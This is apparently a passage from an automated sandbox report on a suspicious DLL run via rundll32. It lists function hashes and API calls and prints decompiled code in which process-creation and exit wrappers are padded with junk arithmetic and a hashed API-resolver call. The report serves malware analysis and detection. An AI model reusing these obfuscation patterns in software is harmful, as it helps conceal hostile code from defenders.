Instruction ID: 715ed677e39b80fca6c2451f69c2f342d901949ca9432e1dfd84eb4d2d81b58a
Opcode Fuzzy Hash: 30daa00f9ed7ea23be0689d122243d6d7c7171fafba721b1ad2257128bfc374a
Instruction Fuzzy Hash: F3B13732D45287DFE712CFE8C960BAEBBA4EF62354F1446AAD4405B3A1C3359942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D85E0, Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 6E7D8611

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 3cc6b1ee5287aac4b81644ab89c261c9cf131cf66a4ec9d73efc3e82ce95b165
Instruction ID: 07dd9a924f2b012a115dd8ba40ab4e66b0eed2d0c6081eb08d4dd9e39c8bf3d9
Opcode Fuzzy Hash: 3cc6b1ee5287aac4b81644ab89c261c9cf131cf66a4ec9d73efc3e82ce95b165
Instruction Fuzzy Hash: E231DB32B052158BEF08CDADE59556EBBE4EF45770B1092BEEC15C7258EB31D850CAC4

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D84A0, Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 6E7D84FE
SysAllocString.OLEAUT32(?), ref: 6E7D8569
_com_issue_error.COMSUPP ref: 6E7D85A5
_com_issue_error.COMSUPP ref: 6E7D85AF

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: c0f2df346da2031eaa3fb95badbe99b683c4fa98ddb7f0ba185e0e35bbad3652
Instruction ID: 4a4414427970c1c037c3128f73ea24f2d28717d6c6aa3708714cf66a07e0ccbb
Opcode Fuzzy Hash: c0f2df346da2031eaa3fb95badbe99b683c4fa98ddb7f0ba185e0e35bbad3652
Instruction Fuzzy Hash: 2531D871A00706DBF7608FD5CA44756B7E8EF01710F10463AE865D7690E774D545CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D8390, Relevance: 6.1, APIs: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 6E7D83F0
_com_issue_error.COMSUPP ref: 6E7D842C
_com_issue_error.COMSUPP ref: 6E7D8436
SysFreeString.OLEAUT32(-00000001), ref: 6E7D8464

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: bffab10c40af0f78212612289059db1e1883190146c8be71d786aa9442f8b269
Instruction ID: 1951ce57212490d6de344bc2094533a8cf680a554511b7b7723f655d4126bc1e
Opcode Fuzzy Hash: bffab10c40af0f78212612289059db1e1883190146c8be71d786aa9442f8b269
Instruction Fuzzy Hash: 3931D7719017169BE7218F99C904B5BB7ECEF01B20F10862EEC64A7790E7B4D846CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E28F0, Relevance: 6.1, APIs: 4, Instructions: 75threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6E81EAA4), ref: 6E7E28FC
GetCurrentThreadId.KERNEL32 ref: 6E7E290C
LeaveCriticalSection.KERNEL32(6E81EAA4), ref: 6E7E293C
SetWindowLongW.USER32(?,000000FC,00000000), ref: 6E7E298F

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
String ID:
API String ID: 3550545212-0
Opcode ID: 1f7832adce6054ab2e29c3564a6c86432f21f126c2001ea2e87e43f4245e308d
Instruction ID: 4191d06a34f2269d8b0d70d93219f81a94cd76d82bafe21d16dd0ff97893c6fd
Opcode Fuzzy Hash: 1f7832adce6054ab2e29c3564a6c86432f21f126c2001ea2e87e43f4245e308d
Instruction Fuzzy Hash: 6921D532604657AF87108FE6DA4485B7B69FF853603049929E848A7F60DB30D850CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7EAC60, Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 6E7EAC7A

Part of subcall function 6E7EABC7: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 6E7EABF6
Part of subcall function 6E7EABC7: ___AdjustPointer.LIBCMT ref: 6E7EAC11

_UnwindNestedFrames.LIBCMT ref: 6E7EAC8F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 6E7EACA0
CallCatchBlock.LIBVCRUNTIME ref: 6E7EACC8

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 9504731aa870a27e8b80bf03c8235c97476a45dd7a2f470bfcd7f70d1e15bee8
Instruction ID: aa5db1cab92262add56fb6e7e91f6dcd9fcde505c9bd710f3e54bb5fbd005ae2
Opcode Fuzzy Hash: 9504731aa870a27e8b80bf03c8235c97476a45dd7a2f470bfcd7f70d1e15bee8
Instruction Fuzzy Hash: BC01C532100109BBDF125E95CE45DEB7F7EEF88758F044414FA1856530D732E861ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D86F0, Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 6E7D86F7
VariantCopy.OLEAUT32(?,?), ref: 6E7D8701
_com_issue_error.COMSUPP ref: 6E7D8713
VariantClear.OLEAUT32 ref: 6E7D8721

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCopyInit_com_issue_error
String ID:
API String ID: 309108855-0
Opcode ID: 83ab420df39a1cee974150c45668c287bc1c9d923c8aea5ad5a321be8f01e403
Instruction ID: e23583f53f66f4bbeed2e533fe664c1c958eda31f7c9ece02d0dd519db7893d0
Opcode Fuzzy Hash: 83ab420df39a1cee974150c45668c287bc1c9d923c8aea5ad5a321be8f01e403
Instruction Fuzzy Hash: 32D05E726005296F9E106BE59D0CDCA7A1CEE123653000469F609C2401CB76C500D7F5

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F6B38, Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F6B9C: _free.LIBCMT ref: 6E7F6BBC

_free.LIBCMT ref: 6E7F6B52

Part of subcall function 6E7F9268: HeapFree.KERNEL32(00000000,00000000,?,6E7F69EA,000000FF,000000FF), ref: 6E7F927E
Part of subcall function 6E7F9268: GetLastError.KERNEL32(6E7F6065,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9290

_free.LIBCMT ref: 6E7F6B65
_free.LIBCMT ref: 6E7F6B76
_free.LIBCMT ref: 6E7F6B87

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 36fb3bc044ac2a113a91dc81310d3953edc0bde89d5f84f0a1537d7156c62b21
Instruction ID: 91c0597570582a2c0f6d8e10a9fa3ca890cda38eed53bf07c744a531560c8ba7
Opcode Fuzzy Hash: 36fb3bc044ac2a113a91dc81310d3953edc0bde89d5f84f0a1537d7156c62b21
Instruction Fuzzy Hash: 89F06D70858A14FFEE066FE4DB288DA3B6EEB766143004607E80C1AB31FB361552CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DB2A0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 204COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,77DCEE0D,00000000,?), ref: 6E7DB30E

Strings

\PerfmonBar\config.xml, xrefs: 6E7DB3C2

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderPath
String ID: \PerfmonBar\config.xml
API String ID: 1514166925-3729978544
Opcode ID: b3d09f51e2124536183da4b078ac9b46bec947aed2ee9f8224ee3acfa03fb6b2
Instruction ID: be98bc62339f6c90f55960b8038b23c7c2200d4081a4f5a074f2301cc9bab130
Opcode Fuzzy Hash: b3d09f51e2124536183da4b078ac9b46bec947aed2ee9f8224ee3acfa03fb6b2
Instruction Fuzzy Hash: A071C471D006589FDB20CFA4CD88BDEB7B4FB08714F10469DD819A7794EB74AA48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F8A7D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6E7F8B0D

Strings

pow, xrefs: 6E7F8AE5, 6E7F8B02

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: d147c62a1d64762690218f1621e7073f94c4dfd5b7ccd9cfc257a6486a5311d6
Instruction ID: b3efc98aac819ae3644be52af95d01c9605cdb567ba228d1b2156fec026bac9d
Opcode Fuzzy Hash: d147c62a1d64762690218f1621e7073f94c4dfd5b7ccd9cfc257a6486a5311d6
Instruction Fuzzy Hash: B1518DA1A1C607CAE70167D9CE1139A3BA4DF41754F208D69E0E4423FDEB798496CF86

Uniqueness

Uniqueness Score: -1.00%

Function 6E804CDB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E804F36,?,00000050,?,?,?,?,?), ref: 6E804DB6

Strings

OCP, xrefs: 6E804D2F
ACP, xrefs: 6E804CF9

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: f2d5befb7d6e6a844dacc34a72a80082c4b0a21b4215cf3b6de7a669f5567421
Instruction ID: 9a0b4af9e8f9a4a443944d18185ccd7e6cd557b40e3d70147ddecd1ba57b6ee7
Opcode Fuzzy Hash: f2d5befb7d6e6a844dacc34a72a80082c4b0a21b4215cf3b6de7a669f5567421
Instruction Fuzzy Hash: 3521C422A95105A6E766CEE5CD01BC773BAEFF1B51B424C58ED09D7244E732D902C290

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E76B1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,6E7E6F36,00000001,00000004,6E7D209A,00000000,?,6E7D1BA7,6E8204C0,6E7D5550,6E8204C4,?,6E7D209A,00000004,00000001), ref: 6E7E7735

Strings

ios_base::failbit set, xrefs: 6E7E76B4

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: ios_base::failbit set
API String ID: 1452528299-3924258884
Opcode ID: d2be2c2614f4c6c516ed06c238760090a177dd412110e6f4a750f853ce60740b
Instruction ID: 3b64257467b9e16b10c802680d95547be5390a44f39a7c7c9515b8c0a8c87dfe
Opcode Fuzzy Hash: d2be2c2614f4c6c516ed06c238760090a177dd412110e6f4a750f853ce60740b
Instruction Fuzzy Hash: CC11003230412AEFDF025FA8CE8499EBB66FF09755B00403CF919C6AA1CB309810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E78AF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 6E7D81F0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,6E81C600), ref: 6E7D81F5
Part of subcall function 6E7D81F0: GetLastError.KERNEL32(?,00000000,00000000,?,6E81C600), ref: 6E7D81FF

IsDebuggerPresent.KERNEL32(?,?,?,6E7D11DF), ref: 6E7E78E2
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6E7D11DF), ref: 6E7E78F1

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6E7E78EC

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 8e9a511a1872425342b2947b2d45699c1868e38fe57589db49a8ea04042858ff
Instruction ID: d2c5196584a55ee008fe7372552b4c6ebaaf863e10669f28a8d8b9b7f8798643
Opcode Fuzzy Hash: 8e9a511a1872425342b2947b2d45699c1868e38fe57589db49a8ea04042858ff
Instruction Fuzzy Hash: 78E06570200B428BE3208FA4D6083467BE8AF14308F008C6CD4EAC6B90EBB5D488CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FE186, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,02E85D48), ref: 6E7FE21C
GetLastError.KERNEL32 ref: 6E7FE22A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6E7FE285

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 6f65370fe2a0681bde41869cfd4b42c6bb97433cb44f52be73f79be43e4cb58d
Instruction ID: e1169674948541dcb26f1babc60b5df16dd11999818f7610f69d04c8b8c6bc04
Opcode Fuzzy Hash: 6f65370fe2a0681bde41869cfd4b42c6bb97433cb44f52be73f79be43e4cb58d
Instruction Fuzzy Hash: CC41B830604A5AEFDB518FE9CA447AA7BB5EF02370F114179E868A73B0E7308902CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7BC5, Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,6E7E2972), ref: 6E7E7BCA
HeapAlloc.KERNEL32(00000000), ref: 6E7E7BD1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E7E7C17
HeapFree.KERNEL32(00000000), ref: 6E7E7C1E

Part of subcall function 6E7E7A64: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6E7E7C0D,00000000), ref: 6E7E7A88
Part of subcall function 6E7E7A64: HeapAlloc.KERNEL32(00000000), ref: 6E7E7A8F

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: 15313bfc84c829068ab09384988b18e297e85b7861802198b743189656716e5e
Instruction ID: 26503c7105fed2dab95a00f5f7ece93f643d61c828685296dcc6e6fd5699813f
Opcode Fuzzy Hash: 15313bfc84c829068ab09384988b18e297e85b7861802198b743189656716e5e
Instruction Fuzzy Hash: 6AF0E973548A169BCB511BFCA90CD5B3A6DAF86751711487CF04AC67D4DF34C400CBA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 7016 Parent PID: 6996 rundll32.exeCOMMON

Executed Functions

Function 007D31D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E007D31D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E007D2523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E007B2309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x007d31da
0x007d31df
0x007d31e1
0x007d31e4
0x007d31e7
0x007d31e8
0x007d31e9
0x007d31ec
0x007d31ef
0x007d31f2
0x007d31f3
0x007d31f4
0x007d31f7
0x007d31fa
0x007d31fd
0x007d31fe
0x007d3200
0x007d3205
0x007d320f
0x007d3214
0x007d321b
0x007d321f
0x007d3223
0x007d322a
0x007d3231
0x007d3235
0x007d3241
0x007d3249
0x007d324c
0x007d3253
0x007d325a
0x007d325e
0x007d3265
0x007d326c
0x007d3273
0x007d327a
0x007d3281
0x007d32a1
0x007d32bb
0x007d32c2

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 007D32BB

Memory Dump Source

Source File: 00000003.00000002.977437652.00000000007B0000.00000040.00000010.sdmp, Offset: 007B0000, based on PE: true

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: e117707ab47937f7f712c737352bef7471bd4a26d866edcfbd4357a9785d1401
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 45311472801248BBCF65DF96CD09CDFBFB5FB99704F108188F914A6220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007B4248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B4248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E007B2309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x007b424e
0x007b4254
0x007b425b
0x007b4262
0x007b4269
0x007b4272
0x007b4277
0x007b427c
0x007b4283
0x007b428a
0x007b4291
0x007b4298
0x007b42a2
0x007b42aa
0x007b42ad
0x007b42b1
0x007b42b5
0x007b42bc
0x007b42c3
0x007b42c7
0x007b42e7
0x007b42f1

APIs

ExitProcess.KERNEL32(00000000), ref: 007B42F1

Memory Dump Source

Source File: 00000003.00000002.977437652.00000000007B0000.00000040.00000010.sdmp, Offset: 007B0000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: f9cbaa7e917a83769766aca8a6d361f6275620f65c9a5cba6b980a96eefe5faa
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: 881128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 007C17CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E007C17CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E007D2523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E007B2309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x007c17d2
0x007c17d5
0x007c17d7
0x007c17db
0x007c17dc
0x007c17e1
0x007c17e8
0x007c17f1
0x007c17f8
0x007c17ff
0x007c1803
0x007c1807
0x007c180e
0x007c181b
0x007c1822
0x007c1825
0x007c182c
0x007c1833
0x007c1844
0x007c1847
0x007c1859
0x007c185c
0x007c1863
0x007c186a
0x007c186e
0x007c1881
0x007c188d
0x007c1893

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 007C188D

Memory Dump Source

Source File: 00000003.00000002.977437652.00000000007B0000.00000040.00000010.sdmp, Offset: 007B0000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 0c9efb327d6d7278faf725af5289cd54dffaf8f108db3358b7c88fd21944da93
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 4C2113B5D0120CFBDB08DFA4D94A9EEBBB4EB44304F208189E425A7241E3B56B149FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 7068 Parent PID: 6984 rundll32.exeCOMMON

Executed Functions

Function 006531D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E006531D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00652523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
